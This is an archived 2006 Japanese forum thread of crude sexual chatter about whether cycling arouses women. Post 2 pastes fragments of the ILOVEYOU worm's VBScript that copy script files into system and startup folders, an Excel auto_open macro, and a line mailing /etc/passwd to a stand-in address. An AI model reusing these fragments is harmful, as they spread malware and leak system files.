2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

女の子って自転車乗って感じちゃわないの?

1 :Ms.名無しさん:2006/09/10(日) 20:26:08
砂利道の振動とかで

2 :Ms.名無しさん:2006/09/10(日) 20:28:10
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub

3 :Ms.名無しさん:2006/09/10(日) 20:31:12
痛いだけだよ

4 :Ms.名無しさん:2006/09/10(日) 20:31:49
4なら俺が親王だ

5 :Ms.名無しさん:2006/09/10(日) 21:24:43
やしがにであったなそんなVTR、女子高生がチャリに乗って踏切りわたって感じてた。

6 :Ms.名無しさん:2006/09/10(日) 21:37:05
女子高生は直パン乗り義務化しる

7 :Ms.名無しさん:2006/09/11(月) 00:15:04
女性用自転車って前傾姿勢にならないようになってるでしょ?

8 :Ms.名無しさん:2006/09/11(月) 01:38:44
おもろw

9 :Ms.名無しさん:2006/09/11(月) 02:04:13
>>11
そんな自転車あんの?!

10 :Ms.名無しさん:2006/09/11(月) 02:06:35
>>11
すごいな!

11 :Ms.名無しさん:2006/09/11(月) 03:58:23
ナイキが開発したらしいよ。
チャリオナニーがはしたないから防止策として。

12 :Ms.名無しさん:2006/09/11(月) 04:13:43
大きなお世話だよね!別にママチャリ漕いでても何も感じないし
そう思いませんか?>>18

13 :Ms.名無しさん:2006/09/13(水) 00:05:39
オリモノシートみたいのが脱着可能なサドルがセールスポイントの自転車ってあるでしょ?
ウチの近所の自転車屋さんで一台だけおいてあるよ。
恥ずかしくて誰も買わないけど。


14 :Ms.名無しさん:2006/09/13(水) 00:09:50
たまーにクリ当たりそうになる時ない?

15 :Ms.名無しさん:2006/09/13(水) 00:18:07
>>16 それわかる!!

16 :Ms.名無しさん:2006/09/13(水) 00:23:27
どっちかというと、ビラがあたって痛い!

17 :Ms.名無しさん:2006/09/14(木) 08:01:53
この間、電車の中でお尻に異物入れられちゃって痛かった。声出そうだったよ。
御蔭で自転車乗れなくてさ、駅から家まで1時間もかかっちゃた。
もうミニ穿くの止める。


18 :Ms.名無しさん:2006/09/14(木) 08:48:38
>>17
なんで叫んだり、助けを呼ばないの?

19 :Ms.名無しさん:2006/09/17(日) 16:00:19
>>17
異物って何?

20 :Ms.名無しさん:2006/09/17(日) 19:12:56
感じることはないけどちょっとだけ気持ちいことはあるけど
やっぱり痛いことが多い。

21 :Ms.名無しさん:2006/09/17(日) 22:30:06
栗がすれてきもちい(*´д`*)

22 :Ms.名無しさん:2006/09/24(日) 19:52:21
>>1
全く感じねーよ
毎日オナってる私が言うんだ間違いない

23 :Ms.名無しさん:2006/09/30(土) 19:24:53
自転車よりは、どちらかというと車ではないの?
子宮に振動が常にくるとか、運転能力の高い男性はセックスもうまいとか
女性を罵倒しない男性は女性に沿う行動がとれるのでセックスの時にも
機転を利かせられるという理由で、車の運転の仕方で性的能力を女性は図るのだから。

24 :Ms.名無しさん:2006/10/02(月) 07:06:42
プロドライバーで事故の非常に少ない漏れのセクースなんか
女性から見たらさぞつまんないんだろうな
カーレースーゲームやったら
「お前ゲームで安全運転するなよ」って言われたし

5 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)